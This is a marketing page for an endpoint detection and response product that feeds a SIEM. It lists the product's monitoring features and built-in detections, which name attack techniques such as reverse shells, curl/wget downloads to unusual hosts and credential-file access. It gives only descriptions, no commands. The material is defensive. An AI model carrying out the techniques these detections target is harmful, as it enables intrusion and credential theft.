Endpoint Detection & Response
Visibility at
Every Endpoint.
Lightweight agent with process monitoring, file integrity checks, behavioral baselines, and automated containment. Native on Linux and macOS.
Endpoint Visibility That Matters
Deep process and file system monitoring without the resource bloat
Process Monitoring
Real-time process creation and termination tracking with full parent-child relationship trees. Powered by netlink CN_PROC on Linux and Endpoint Security framework on macOS.
File Integrity Monitoring
Watch critical directories for file creation, modification, and deletion. Uses inotify on Linux and FSEvents on macOS for kernel-level visibility.
Behavioral Baselines
Learn normal process behavior per endpoint and detect deviations. UEBA-integrated baseline learning from process telemetry.
Allow & Deny Policies
Define process execution policies to block unauthorized software or enforce approved application lists across your fleet.
MITRE ATT&CK Rules
32 built-in detection rules mapped to MITRE ATT&CK techniques -- 25 process-based, 5 file integrity, and 2 EICAR test rules. Evaluated locally on the agent.
Fleet Management
Centralized agent registration via enrollment tokens, heartbeat monitoring, and configuration push from the SIEM management console.
How It Works
Lightweight agent architecture designed for minimal endpoint impact
Token-Based Enrollment
Agents register with the SIEM using enrollment tokens. No manual configuration per endpoint.
Heartbeat Monitoring
Periodic heartbeats report agent health, version, and status. Silent agents trigger alerts automatically.
TLS Transport
All telemetry is published to the SIEM over persistent TLS connections. Encrypted end-to-end.
Local Rule Evaluation
Detection rules run locally on the agent using the native DSL engine. Alerts fire without round-tripping to the server.
What It Detects
Built-in rules cover common attack techniques out of the box
Reverse Shells
Detect common reverse shell patterns and suspicious shell spawning from web servers or services.
Privilege Escalation
Monitor for sudo abuse, SUID exploitation, and unexpected privilege changes.
Suspicious Downloads
Flag curl/wget to unusual destinations, encoded payloads, and script downloads from untrusted sources.
Config Tampering
Watch for modifications to critical system files, SSH configs, cron jobs, and startup scripts.
Credential Access
Detect access to password files, shadow databases, and credential stores.
Defense Evasion
Identify process name masquerading, log clearing, and history file manipulation.
Persistence
Monitor cron, systemd, launchd, and rc.local for unauthorized persistence mechanisms.
Discovery Activity
Flag local enumeration tools, network scanning from endpoints, and system reconnaissance commands.
Native SIEM Integration
EDR telemetry flows directly into Void SIEM for unified visibility
Automatic Correlation
Endpoint events correlate with network, cloud, and application data for complete attack chain visibility.
Process Tree Visualization
Full process trees rendered in the SIEM investigation view. Trace execution chains from initial access to impact.
Automated Response
SOAR playbooks can trigger endpoint containment actions based on detection rules and severity thresholds.
Lightweight by Design
Minimal Footprint
Single static binary. Low memory and CPU usage even under heavy process churn.
Single Binary
No runtime dependencies. Deploy via package manager, configuration management, or direct copy.
Hot Configuration
Policy and rule updates pushed from SIEM without restarting the agent.
Local Buffering
Events buffered locally if the SIEM connection drops. Delivered automatically when connectivity resumes.
Protect Every Endpoint
Request a demo or licensing details for Void EDR.